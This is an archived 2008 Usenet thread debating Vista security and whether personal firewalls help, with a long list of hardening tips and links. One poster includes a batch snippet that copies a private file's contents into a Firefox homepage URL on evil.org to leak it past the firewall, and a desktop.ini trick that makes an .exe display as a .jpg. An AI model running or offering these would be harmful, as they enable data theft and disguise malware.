-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

I just got a new laptop a few days ago, running Vista Home Premium. I am
in the midst of "customizing" it. Presently, I am running the Microsoft
Firewall. Is this an act of blind faith on my part. In the last few
months of life of my last laptop, I ran Comodo Pro and was satisfied.

I'd prefer to run a free firewall, if that is prudent.

Any suggestions?

Thanks for your time and attention.

Q.N. Tibi

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.2 (Build 3005)
Comment: Protect Your Privacy With Encryption! www.pgp.com
Charset: utf-8

wsFVAwUBR+huJnAfpDHwMsutAQh1Ig//cx0fN32FtYk4yww/2Jky9xd/dOL38F0r
eOzNSBBqoh3g1Hu+60R0lWnNakNISGqiTGirp/nUeUaPzXCXq6qKF5oXGbc6E05Y
UHssKXRIMkDoff7CjY1B3d52g9qIj+/xePosr9OiL4+WMF7XDvRgNttFe/+bV3ef
ETOwPifNE+kt2Zp1aPDcBd1Jj3zn1f637qXPlDfiWsVqzSKC0+OFbjUlZsOxIZ6F
JHsCtU3FdYqtKig+skbpYCSv/o+HUBqBLNvHhBZbm0rRA2LfIMEVVGZEexfqpMiu
iDidgCDZBrdJU3hQ2i77zolNSRwP8IleaO0yjMqJDenE2YFmcgacvi7QfpKlfVcn
2+4eKg8q4XRHaJF1pBeSzNLLrka5zSlImK8cwIm15WwtEbcH8Apb0GxZCnVrOnI9
0GFlkXPBs4PjZd3DlLMPH0vRehtA3ctSYluiAZ/ur5hznw9sjin0iq6AB5oxFIMB
rSBjdQtWs059Wg4L2DfTLbk5d2tBvVSSv4vt1plZGs1LsfBPybxWiQ3YaYZR+ZtN
r4dRa4bq2b5WbXB+f6DbAvmpVtKKShW23pMtNYInOVsfgxx+n/o5O0jW7meOgUIG
I6Evbsj89LqWyfrwIf/T6CBch2m16CEoFbQM9YTzygRfHA3tZYF44iEimQi2MZb2
EFBQXjwBaIY=
=4Ygx
-----END PGP SIGNATURE-----

quodnomentibi@remailed.ws wrote:


> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part.


Yes. Windows Vista is trivially insecure.

> In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.


The only question is if this wasn't even worse.


> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?


Wipfw. But first you need to get rid of Vista.

On Mon, 24 Mar 2008 23:35:12 -0600 (MDT), quodnomentibi@remailed.ws wrote:
>
> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part. In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?
>
The best defenses are:
1. Do not work in elevated level; Day-to-day work should be
performed while the User Account Control (UAC) is enabled. Turning
off UAC reduces the security of your computer and may expose you to
increased risk from malicious software.
2. Familiarize yourself with "Services Hardening in Windows Vista".
3. Keep your operating (OS) system (and all software on it)
updated/patched.
4. Reconsider the usage of IE.
5. Review your installed 3rd party software applications/utilities;
Remove clutter.
6. Don't expose services to public networks.
7. Activate the build-in firewall and tack together its advanced
configuration settings.
7a.If on high-speed internet use a router as well.
8. Routinely practice safe-hex.
9. Regularly back-up data/files.
10.Familiarize yourself with crash recovery tools and with
re-installing your operating system (OS).
11.Utilize a real-time anti-virus application and vital system
monitoring utilities/applications.
12.Keep abreast of the latest developments - ***** happens...you know.

The least preferred defenses are:
Myriads of popular anti-whatever applications and staying ignorant.

Peez of pith, really :-)

Kayman wrote:


> The best defenses are:
> 1. Do not work in elevated level;


Doesn't matter; in Windows Vista it's trivial to elevate with any consent.

> Day-to-day work should be
> performed while the User Account Control (UAC) is enabled.


UAC is trivial to spoof, and since it doesn't apply to all administrative
actions it's trivially insecure. Even further, since there's no need to
approve administrative actions if an elevated program is running in the
desktop context of an unprivileged, it's even more insecure.


> 4. Reconsider the usage of IE.


There is nothing to reconsider. IE is a perfectly fine ActiveX Rich Platform
Client, a wonderful platform to implement complex software clients in a
trusted environment.
The only problem is that some people seem to understand it a webbrowser, and
consequently abuse it as such. Obviously a stupid idea.

> 7a.If on high-speed internet use a router as well.


Huh? Why?

> 9. Regularly back-up data/files.


And why isn't this #1?

> 11.Utilize a real-time anti-virus application


Wonderful idea. Introduce a horribly buggy and pretty useless piece of
software....

> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it. Presently, I am running the Microsoft
> Firewall. Is this an act of blind faith on my part. In the last few
> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
> I'd prefer to run a free firewall, if that is prudent.
>
> Any suggestions?
>
> Thanks for your time and attention.
>
> Q.N. Tibi

I'm running Comodo firewall pro v3 on Vista and it's been fine. I also like
Online Armor and there will be a Vista compatible version in the near
future.

Victek wrote:


> I'm running Comodo firewall pro v3 on Vista and it's been fine.


Which only shows that you never bothered auditing it.

> I also like Online Armor

Which supports my claim, since this one is even worse.

OK, one shouldn't expect much if any understanding of security from a
Windows Live Mail user... but please, if you have no clue, then please don't
make suggestions to others.

On Tue, 25 Mar 2008 21:05:56 +0100, Sebastian G. wrote:

> OK, one shouldn't expect much if any understanding of security from a
> Windows Live Mail user... but please, if you have no clue, then please don't
> make suggestions to others.

It's a good thing you are here to show us The Way, oh Wise One... |-)

--
s|b

On Mon, 24 Mar 2008 23:35:12 -0600 (MDT), quodnomentibi@remailed.ws wrote:
>
> I just got a new laptop a few days ago, running Vista Home Premium. I am
> in the midst of "customizing" it.

<snip>

Q.N. Tibi

Here are some detailed references in relation to my earlier post. You may
whish to consider these when "customizing" your OS.

re: #1
Windows User Account Control Step-by-Step Guide
http://technet2.microsoft.com/WindowsVista/en/library/0d75f774-8514-4c9e-ac08-4c21f5c6c2d91033.mspx?mfr=true

re: #2
Services Hardening in Windows Vista
http://www.microsoft.com/technet/technetmag/issues/2007/01/SecurityWatch/
10 Immutable Laws of Security
http://www.microsoft.com/technet/archive/community/columns/security/essays/10imlaws.mspx?mfr=true

re: #3
Keep your operating system (OS) and all software on it updated/patched.
"So, you didn’t patch the system and it got hacked. What to do? Well, let’s
see: ..."
"The only way to clean a compromised system is to flatten and rebuild.
That’s right. If you have a system that has been completely compromised,
the only thing you can do is to flatten the system (reformat the system
disk) and rebuild it from scratch (re-install Windows and your
applications)..."
http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx

Windows update.
http://www.update.microsoft.com/windowsupdate/v6/default.aspx?ln=en-us
Secunia Personal Software Inspector
http://secunia.com/software_inspector
https://psi.secunia.com/ and
M/S Security Baseline Analyzer 2.0
http://www.microsoft.com/downloads/details.aspx?FamilyId=4B4ABA06-B5F9-4DAD-BE9D-7B51EC2E5AC9&displaylang=en
can assist also.

re: #4
Utilizing another browser application can add to the overall security of
the OS. But,
Microsoft says Internet Explorer more secure than Firefox :-)
http://www.heise-security.co.uk/news/99955

IE7 safe/secure settings
Internet Explorer7 Desktop Security Guide
http://www.microsoft.com/downloads/details.aspx?FamilyId=6AA4C1DA-6021-468E-A8CF-AF4AFE4C84B2&displaylang=en

The Internet Explorer 7 Security Status Bar
http://www.microsoft.com/windows/products/winfamily/ie/ev/security.mspx

Extended Validation SSL Certificates
http://www.microsoft.com/windows/products/winfamily/ie/ev/default.mspx

Note: *Tight security settings will break down some websites. You need to
add these websites into the Trusted Zone for smooth access.*

You could consider disabling all Security Settings in IE and use IE only
for the 'Patch Tuesday' updates; To do so you must add the following URL's
to the Trusted sites:
http://update.microsoft.com
http://download.windowsupdate.com
https://*.update.microsoft.com
http://*.update.microsoft.com
http://*.microsoft.com

Alternative Browsers:
Opera™
http://www.opera.com/download/

Firefox™
http://www.mozilla.com/en-US/

The SeaMonkey® Suite (Internet Browser)
http://www.seamonkey-project.org/

re: #5
Review your installed 3rd party software applications;
Remove clutter, dispose of all your 'Anti-Whatever' applications. Keep you
pc lean, install only applications you are really need - try to be a
'minimalist'.
Belarc Advisor can assist
http://www.belarc.com/free_download.html
as can
Absolute Uninstaller
http://www.glarysoft.com/au.html
Revo Uninstaller
http://www.revouninstaller.com/ and/or
Brute Force Uninstaller
http://www.majorgeeks.com/Brute_Force_Uninstaller_BFU_d4714.html

re: #6
Windows Vista Service Configurations Introduction
http://www.blackviper.com/WinVista/servicecfg.htm

re: #7
Tap into the Vista firewall's advanced configuration features
http://articles.techrepublic.com.com/5100-10877-6098592.html
"...once you discover the secret of accessing its advanced configuration
settings via the MMC snap-in, you'll find it to be far more configurable
and functional. At last, Windows comes with a sophisticated personal
firewall that can be used to set up outbound rules as well as inbound, with
the ability to customize rules to fit your precise needs."
Or
Configure Vista Firewall to support outbound packet filtering
http://searchwindowssecurity.techtarget.com/tip/0,289483,sid45_gci1247138,00.html
Or
Vista Firewall Control (Free versions available)
http://sphinx-soft.com/Vista/

re: #8
Routinely practice Safe-Hex.
http://www.claymania.com/safe-hex.html
Hundreds Click on 'Click Here to Get Infected' Ad
http://www.eweek.com/article2/0,1895,2132447,00.asp

re: #9
Back Up regularly; Develop a Contingency Plan; Be prepared!
Consider "What if..."

Use Windows to back up your computer.
http://www.microsoft.com/protect/yourself/data/backup.mspx

Powerful backup that is easy to do!
http://www.acronis.com.sg/homecomputing/

Casper™ Backup Solution for Windows
http://www.fssdev.com/

Norton Ghost™
http://www.symantec.com/norton/products/overview.jsp?pcid=br&pvid=ghost12

Free Back-Up Programs; There are many more - mileages will vary - get
appropriate advice before deciding on application.
http://www.karenware.com/powertools/ptreplicator.asp
http://www.2brightsparks.com/downloads.html#freeware
http://www.sover.net/~wysiwygx/WinUtils5.html
http://xxclone.com/
http://www.educ.umu.se/~cobian/cobianbackup.htm

'Must-have' utilities:
ERUNT and NTREGOPT
http://www.larshederer.homepage.t-online.de/erunt/

re: #10
Familiarize yourself with Crash recovery applications;
***** happens, you know! (Don't get caught flatfooted!)

Beginners Guides: Crash Recovery - Dealing with the Blue Screen Of Death
http://www.pcstats.com/articleview.cfm?articleID=1647

Bart's Preinstalled Environment (BartPE) bootable live windows CD/DVD
http://www.nu2.nu/pebuilder/

Windows PE 2.0 for Windows Vista Overview
http://technet.microsoft.com/en-us/windowsvista/aa905120.aspx

10a.
Re-install OS (reformat HDD). *See Footnote.
Back all your important Data files, Documents, Photo, Music, Etc. to CD or
DVD media.
Download all the necessary drivers for Vista (motherboard, Video Card,
Audio, Network card, Etc.)
Verify that you have the Application DVD and key code.
Belarc Advisor can assist:
http://www.belarc.com/free_download.html

How to install Windows Vista
http://support.microsoft.com/kb/918884
Scroll down to:
How to perform a clean installation of Windows Vista by starting the
computer from the Windows Vista DVD

re: #11
Utilize some system monitoring utilities/applications.
Process Explorer
http://technet.microsoft.com/en-au/sysinternals/bb896653.aspx
AutoRuns for Windows
http://technet.microsoft.com/en-au/sysinternals/bb963902.aspx
What's Running
http://www.whatsrunning.net/whatsrunning/main.aspx
RunScanner
http://www.runscanner.net/
TCPView for Windows
http://technet.microsoft.com/en-au/sysinternals/bb897437.aspx
CurrPorts - View Opened TCP/IP ports/connections
http://www.nirsoft.net/utils/cports.html
WALLWATCHER - Collect, View, and Analyze Router Logs
http://sonic.net/wallwatcher/

Beginners may wish to employ a real-time AV application.
Real-time AV applications - for viral malware.
Do not utilize more than one (1) real-time anti-virus scanning engine!
Disable the e-mail scanning function during installation (Custom
Installation on some AV apps.) as it provides no additional
protection. http://www.oehelp.com/OETips.aspx#3
In fact, most of experts (incl. Norton) believe that scanning incoming and
outgoing mail causes e-mail file corruption.

Free antivirus - avast! 4 Home Edition
http://www.avast.com/eng/avast_4_home.html
(Choose Custom Installation and under Resident
Protection, uncheck: Internet Mail and Outlook/Exchange.)

Avira AntiVir® PersonalEdition Classic - Free
http://www.free-av.com/antivirus/allinonen.html

AVG Anti-Virus Free Edition
http://free.grisoft.com/

Activate the in build Windows Defender application
Interesting reading:
http://www.pcworld.com/article/id,136195/article.html
"...Windows Defender did excel in behavior-based protection, which detects
changes to key areas of the system without having to know anything about
the actual threat."

And for the really paranoid consider utilizing:
SUPERAntiSpyware Free (in conjunction with WinDef)
http://www.superantispyware.com/superantispywarefreevspro.html

re: #12
Windows Vista Security Guide
http://www.microsoft.com/Downloads/details.aspx?FamilyID=a3d1bbed-7f35-4e72-bfb5-b84a526c1565&displaylang=en

*Footnote:
Reformatting of HDD is the preferred course of action! But if this is
beyond your capabilities then consult professional computer services (but
not the supermarket-type repair shops). If this is not an option then you
may be able to clean your OS by employing David H. Lipman's MULTI_AV.EXE
which can be downloaded from the URL:-

English:
http://www.raymond.cc/blog/archives/2008/01/09/scan-your-computer-with-multiple-anti-virus-for-free/

Swiss/German:
http://www.pctipp.ch/downloads/dl/35905.asp

To use this utility, perform the following...
Execute; Multi_AV.exe { Note: You must use the default folder C:\AV-CLS }
Choose; Unzip
Choose; Close

Execute; C:\AV-CLS\StartMenu.BAT
{ or Double-click on 'Start Menu' in C:\AV-CLS }

NOTE: You may have to disable your software FireWall or allow WGET.EXE to
go through your
FireWall to allow it to download the needed AV vendor related files.

C:\AV-CLS\StartMenu.BAT -- { or Double-click on 'Start Menu' in C:\AV-CLS}
This will bring up the initial menu of choices and should be executed in
Normal Mode. This way all the components can be downloaded from each AV
vendor's web site.

The choices are; Sophos, Trend, McAfee, Kaspersky, Exit this menu and
Reboot the PC.

You can choose to go to each menu item and just download the needed files
or you can download the files and perform a scan in Normal Mode. Once you
have downloaded the files needed for each scanner you want to use, you
should reboot the PC into Safe Mode [F8 key during boot] and re-run the
menu again and choose which scanner you want to run in Safe
Mode. It is suggested to run the scanners in both Safe Mode and Normal
Mode.

When the menu is displayed hitting 'H' or 'h' will bring up a more
comprehensive PDF help file.

Additional Instructions:
http://pcdid.com/Multi_AV.htm

(Note: An experienced and prepared operator probably will reformat a HDD
faster then utilizing the MULTI_AV scanning tool).

Good luck :)

Sebastian G. wrote:
> quodnomentibi@remailed.ws wrote:
>
>
>> I just got a new laptop a few days ago, running Vista Home Premium. I am
>> in the midst of "customizing" it. Presently, I am running the Microsoft
>> Firewall. Is this an act of blind faith on my part.
>
>
> Yes. Windows Vista is trivially insecure.
>
do you have some evidence stating that fact?
are you talking about microsoft os'es in general?
since i really need some evidence to put on the table
so my boss stops looking into vista as a worthy domain
OS
>> In the last few
>> months of life of my last laptop, I ran Comodo Pro and was satisfied.
>
>
> The only question is if this wasn't even worse.
>
>
>> I'd prefer to run a free firewall, if that is prudent.
>>
>> Any suggestions?
>
>
> Wipfw. But first you need to get rid of Vista.

goarilla <"kevin<punt>paulus|"@|skynet punt> wrote:


>> Yes. Windows Vista is trivially insecure.
>>
> do you have some evidence stating that fact?


- you can spoof filename via desktop.ini, which itself can be triggered by
shell namespaces
- UAC doesn't apply to all administrative actions and is trivial to spoof;
if you run as admin, it is trivial to circumvent; it provides no isolation;
if a file includes a prudent application manifest or triggers the setup
program detection, it won't even let you run a program without elevation
- PatchGuard makes it trivial to corrupt kernel memory just by debugging an
application in usermode
- not even talking about what system access you get granted for simply
presenting a DRMed media file...

> are you talking about microsoft os'es in general?


No. NT 5.1 and 5.2 look pretty secure.

> since i really need some evidence to put on the table
> so my boss stops looking into vista as a worthy domain
> OS


Oh, that's simple: Install it on his computer so he can try it for a while.
Very likely that after two weeks he'll be fed up with it.

Sebastian G. wrote:

> Wipfw. But first you need to get rid of Vista.

Please qualify your comment about issues with Vista security. As you
always do, you talk out of your arse.

Q wrote:

> Sebastian G. wrote:
>
>> Wipfw. But first you need to get rid of Vista.
>
> Please qualify your comment about issues with Vista security. As you
> always do, you talk out of your arse.


<news:64vk7lF25nl57U1@mid.dfncis.de>

Sebastian G. wrote:

> <news:64vk7lF25nl57U1@mid.dfncis.de>

Is that your email address and news should be mail?

Why can't you post proof of concept links here? Sorry for the talking
out of your arse comment. It was uncalled for. Would just like to see
some proof of what you say though.

Q wrote:

> Sebastian G. wrote:
>
>> <news:64vk7lF25nl57U1@mid.dfncis.de>
>
> Is that your email address and news should be mail?


No, it's a reference to one of my postings in this thread. Is your
newsreader that defective?

> Why can't you post proof of concept links here?


Actually you can easily derive a PoC just from the description. For example
the filename localization issue is well known, and you can take already
existing desktop.ini files utilizing this feature directly from the Vista
installation. Or, for example, a privilege that doesn't UAC consent is
SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all ACLs and grants
access to the raw disk.
On the other hand, you'll find in-detail information about the
implementation of PatchGuard at <http://uninformed.org/>. With a bit
detailed understanding, you'll see that debugging heavily interacts with
PatchGuard in almost unforseen ways (since it is, by itselt, nothing but a
dirty kernel hack).

Sebastian G. wrote:
>
> No, it's a reference to one of my postings in this thread. Is your
> newsreader that defective?

There is no proof in any of your postings to this thread.

Sebastian G. wrote:

> Actually you can easily derive a PoC just from the description. For
> example the filename localization issue is well known, and you can take
> already existing desktop.ini files utilizing this feature directly from
> the Vista installation. Or, for example, a privilege that doesn't UAC
> consent is SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all
> ACLs and grants access to the raw disk.
> On the other hand, you'll find in-detail information about the
> implementation of PatchGuard at <http://uninformed.org/>. With a bit
> detailed understanding, you'll see that debugging heavily interacts with
> PatchGuard in almost unforseen ways (since it is, by itselt, nothing but
> a dirty kernel hack).

Every OS has exploits and is continually being patched. Linux has plenty
of it's own, you just don't hear about them as much or they get patched
quietly in the background. So your whole point is what exactly?

Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Actually you can easily derive a PoC just from the description. For
>> example the filename localization issue is well known, and you can take
>> already existing desktop.ini files utilizing this feature directly from
>> the Vista installation. Or, for example, a privilege that doesn't UAC
>> consent is SE_BACKUP_RESTORE_PRIVILEGE, which allows you to bypass all
>> ACLs and grants access to the raw disk.
>> On the other hand, you'll find in-detail information about the
>> implementation of PatchGuard at <http://uninformed.org/>. With a bit
>> detailed understanding, you'll see that debugging heavily interacts with
>> PatchGuard in almost unforseen ways (since it is, by itselt, nothing but
>> a dirty kernel hack).
>
> Every OS has exploits and is continually being patched. Linux has plenty
> of it's own, you just don't hear about them as much or they get patched
> quietly in the background. So your whole point is what exactly?


Seems like you don't even understand the difference between random and
systematic errors...

Rat River Cemetary wrote:

> Sebastian G. wrote:
>> No, it's a reference to one of my postings in this thread. Is your
>> newsreader that defective?
>
> There is no proof in any of your postings to this thread.


I never presented it as a proof, neither has been ask for some.

Sebastian G. wrote:

>
> I never presented it as a proof, neither has been ask for some.

I have and still see no positive proof from you.

Sebastian G. wrote:

> Seems like you don't even understand the difference between random and
> systematic errors...

Seems like you are nothing but a wind bag full of hot air. All talk and
no action.

Sebastian G. wrote:

> Which supports my claim, since this one is even worse.
>
> OK, one shouldn't expect much if any understanding of security from a
> Windows Live Mail user... but please, if you have no clue, then please
> don't make suggestions to others.

I saw you once post proof of concept code to prove that any software
firewall can be bypassed. Would you please post that again as I want to
read it again, thanks.

Sebastian G. wrote:

> Seems like you don't even understand the difference between random and
> systematic errors...

Still waiting for your proof. BTW, so are some other people over at a
reputable web forum. They claim you are a Usenet loon and have no actual
proof. Put up or shut up.

Rat River Cemetary <dead@rat.here> wrote:
> I saw you once post proof of concept code to prove that any software
> firewall can be bypassed. Would you please post that again as I want to
> read it again, thanks.

Hi,

for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).

After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
breakout-wp.cpp - and they lost again.

This topic is somewhat boring now.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Which supports my claim, since this one is even worse.
>>
>> OK, one shouldn't expect much if any understanding of security from a
>> Windows Live Mail user... but please, if you have no clue, then please
>> don't make suggestions to others.
>
> I saw you once post proof of concept code to prove that any software
> firewall can be bypassed. Would you please post that again as I want to
> read it again, thanks.


You mean something like this one?

setlocal enabledelayedexpansion
set x=
for /f "delims=" %%i in (your_private_document.txt) do set x=!x! %%i
for /r %%i in (prefs.js) do echo
user_pref("browser.startup.homepage","http://evil.org/catch.pl?!x!");>>"%%i"

And then just wait until the user starts Firefox...

Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Seems like you don't even understand the difference between random and
>> systematic errors...
>
> Still waiting for your proof.


Are you really too stupid to simply write a desktop.ini with the content:

[LocalizedFilenames]
foo.exe=bar.jpg

and place it onto your desktop?

>> I saw you once post proof of concept code to prove that any software
>> firewall can be bypassed. Would you please post that again as I want to
>> read it again, thanks.
>
> Hi,
>
> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>
> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
> breakout-wp.cpp - and they lost again.
>
> This topic is somewhat boring now.
>
> Yours,
> VB.

No security is perfect. Why does the fact you can break it imply that it
has no value?

>> I saw you once post proof of concept code to prove that any software
>> firewall can be bypassed. Would you please post that again as I want to
>> read it again, thanks.
>
> Hi,
>
> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>
> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
> breakout-wp.cpp - and they lost again.
>
> This topic is somewhat boring now.
>
> Yours,
> VB.

No security is perfect. Why does the fact you can break it imply that it
has no value?

Victek <victek@invalid.invalid> wrote:
>>> I saw you once post proof of concept code to prove that any software
>>> firewall can be bypassed. Would you please post that again as I want to
>>> read it again, thanks.
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>> This topic is somewhat boring now.
> No security is perfect. Why does the fact you can break it imply that it
> has no value?

Because I needed 15 minutes to break the first time, and a meal with
friends on a Saturday evening to **** up the second time.

And: we had a closer look onto common "Personal Firewall"
implementations, and all what I saw was a terrible, incompetent mess.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Victek wrote:

>>> I saw you once post proof of concept code to prove that any software
>>> firewall can be bypassed. Would you please post that again as I want to
>>> read it again, thanks.
>> Hi,
>>
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>>
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>>
>> This topic is somewhat boring now.
>>
>> Yours,
>> VB.
>
> No security is perfect. Why does the fact you can break it imply that it
> has no value?

Security requires reliability. The above shows a reliability of zero.

Sebastian G. wrote:

>
> Are you really too stupid to simply write a desktop.ini with the content:
>
> [LocalizedFilenames]
> foo.exe=bar.jpg
>
> and place it onto your desktop?

I'm talking about all of your claims and not just that one. Calling me
stupid does nothing for your credibility at all so either stop with the
hostile attitude and provide your own proof of concept or admit you are
a liar and nothing but a Usenet loon.

Rat River Cemetary wrote:


> I'm talking about all of your claims and not just that one. Calling me
> stupid does nothing for your credibility at all so either stop with the
> hostile attitude and provide your own proof of concept or admit you are
> a liar and nothing but a Usenet loon.


Or not willing to waste my time on trivial things that I consider being easy
enough for you to figure it out on your own. As if I would care what you're
thinking of me...

Sebastian G. wrote:

> Or not willing to waste my time on trivial things that I consider being
> easy enough for you to figure it out on your own. As if I would care
> what you're thinking of me...

Here's what my man on the inside has to say to you. Loon!

"Neither the batch commands, nor the .c programs are remote exploits of
a firewall. The batch files just seems to copy prefs.js around the
system, it doesn't attain Admin from a limited user nor does it execute
code on remote sysems, so it's not an exploit. Ditto for the .c
programs, they just send messages to other windows, windows is designed
to allow that. That is not demostration of a remote exploit or local
privilege escalation exploit.

Also, in Vista you can't send a high integrity process (admin services
and programs with admin privileges) a message from a lower integrity
processes, like say medium integrity (non-UAC prompting programs)
processes or low integrity processes (sandboxed programs like IE7). And
neither can low integrity processes send message to medium integrity
processes.
Ergo, something like this might work in XP but not in Vista if you run
as the system was designed to run (with UAC on).

What you asked about is Vista, and these are not Vista exploits."

Volker Birk wrote:

> Hi,
>
> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>
> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
> breakout-wp.cpp - and they lost again.
>
> This topic is somewhat boring now.
>
> Yours,
> VB.

Man on the inside says this.

"Neither the batch commands, nor the .c programs are remote exploits of
a firewall. The batch files just seems to copy prefs.js around the
system, it doesn't attain Admin from a limited user nor does it execute
code on remote sysems, so it's not an exploit. Ditto for the .c
programs, they just send messages to other windows, windows is designed
to allow that. That is not demostration of a remote exploit or local
privilege escalation exploit.

Also, in Vista you can't send a high integrity process (admin services
and programs with admin privileges) a message from a lower integrity
processes, like say medium integrity (non-UAC prompting programs)
processes or low integrity processes (sandboxed programs like IE7). And
neither can low integrity processes send message to medium integrity
processes.
Ergo, something like this might work in XP but not in Vista if you run
as the system was designed to run (with UAC on).

What you asked about is Vista, and these are not Vista exploits."

Sebastian G. wrote:

> Yes. Windows Vista is trivially insecure.

Care to comment on the below?

http://dvlabs.tippingpoint.com/blog/2008/03/28/pwn-to-own-final-day-and-wrap-up

Rat River Cemetary <dead@rat.here> wrote:
> Volker Birk wrote:
>> for my part: first I wrote http://www.dingens.org/breakout.c (for IE6)
>> and http://www.dingens.org/breakout-mozilla-firefox.c (for Firefox 1.x).
>> After that, at least Zone Alarm and Comodo tinkered again. Then I wrote
>> breakout-wp.cpp - and they lost again.
>> This topic is somewhat boring now.
> Man on the inside says this.
> "Neither the batch commands, nor the .c programs are remote exploits of
> a firewall.

What "batch files"? Is this text about something else?

> What you asked about is Vista, and these are not Vista exploits."

I did not talk about Vista, but about "Personal Firewalls".

And I'm not talking about remote exploits or exploits at all.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
zeroes. For example, an indirect node file with link reference 123 would
have the name "iNode123". - HFS Plus Volume Format, MacOS X

Volker Birk wrote:

> What "batch files"? Is this text about something else?

Se3astion posted a batch file that I included in with your code. He is
referring to that.


> I did not talk about Vista, but about "Personal Firewalls".
>
> And I'm not talking about remote exploits or exploits at all.
>
> Yours,
> VB.

You're right.

Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Yes. Windows Vista is trivially insecure.
>
> Care to comment on the below?
>
> http://dvlabs.tippingpoint.com/blog/2008/03/28/pwn-to-own-final-day-and-wrap-up


Obviously the guy wanted the MacBook Air (I'd want it too), and the guys who
wanted the Wintel notebook didn't manage to prepare the pre-made IE exploits
fast enough.

Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Or not willing to waste my time on trivial things that I consider being
>> easy enough for you to figure it out on your own. As if I would care
>> what you're thinking of me...
>
> Here's what my man on the inside has to say to you. Loon!


See below for the obvious reasons why I don't care for the opinions of idiots...

> "Neither the batch commands, nor the .c programs are remote exploits of
> a firewall.


I never claimed a remote exploit.

> The batch files just seems to copy prefs.js around the
> system,


Bullshit. It reads the context of a file, puts in into a URL and writes to
prefs.js to set it as the default homepage. The next time the user starts up
Firefox, the homepage is surfed to, and the data are transmitted this way.

> it doesn't attain Admin from a limited user nor does it execute
> code on remote sysems, so it's not an exploit. Ditto for the .c
> programs, they just send messages to other windows, windows is designed
> to allow that. That is not demostration of a remote exploit or local
> privilege escalation exploit.


But it is an exploit against the application security feature of personal
firewalls.

> Also, in Vista you can't send a high integrity process (admin services
> and programs with admin privileges) a message from a lower integrity
> processes, like say medium integrity (non-UAC prompting programs)
> processes or low integrity processes (sandboxed programs like IE7).


Wrong as well. Clipboard commands, NetDDE and COM+ Remoting are allowed,
also Named Pipes, Mailslots, Shared Sections, BaseNameObjects, JobObjects
etc. are shared.

> What you asked about is Vista, and these are not Vista exploits."


Never claimed those to be Vista exploits, even though they work quite well
under Vista.

Sebastian G. wrote:

> Obviously the guy wanted the MacBook Air (I'd want it too), and the guys
> who wanted the Wintel notebook didn't manage to prepare the pre-made IE
> exploits fast enough.


IE7 on Vista runs in protected mode and is the most secure browser there
is because of it. Unless of course you run something like OB1 that
doesn't support any scripting at all. Because of your hostile attitude
and lack of objectivity I must end our conversation because you are not
worth my time and are a nasty bullshitter. I hope others are smart
enough to see you for what you really are.

Rat River Cemetary wrote:

> Sebastian G. wrote:
>
>> Obviously the guy wanted the MacBook Air (I'd want it too), and the guys
>> who wanted the Wintel notebook didn't manage to prepare the pre-made IE
>> exploits fast enough.
>
>
> IE7 on Vista runs in protected mode and is the most secure browser there
> is because of it.


Nonsense. IE by itself is as easy to compromise as ever, and breaking out of
the protected mode is trivial[1][2].

> Because of your hostile attitude
> and lack of objectivity I must end our conversation because you are not
> worth my time and are a nasty bullshitter. I hope others are smart
> enough to see you for what you really are.

One should rather hope that others are smart enough to not fall for your
obviously ridiculous claims about others.

[1] http://uninformed.org/?v=8&a=6&t=sumry
[2] http://blogs.technet.com/markrussinovich/archive/2007/02/12/638372.aspx

Rat River Cemetary <dead@rat.here> wrote:
> IE7 on Vista runs in protected mode and is the most secure browser there
> is because of it.

Unless IE stops supporting ActiveX and thus supporting manipulating
arbitrary COM objects, it's a security nightmare and not "the most
secure browser".

ActiveX is a design flaw, and never can be fixed.

Yours,
VB.
--
The file name of an indirect node file is the string "iNode" immediately
followed by the link reference converted to decimal text, with no leading
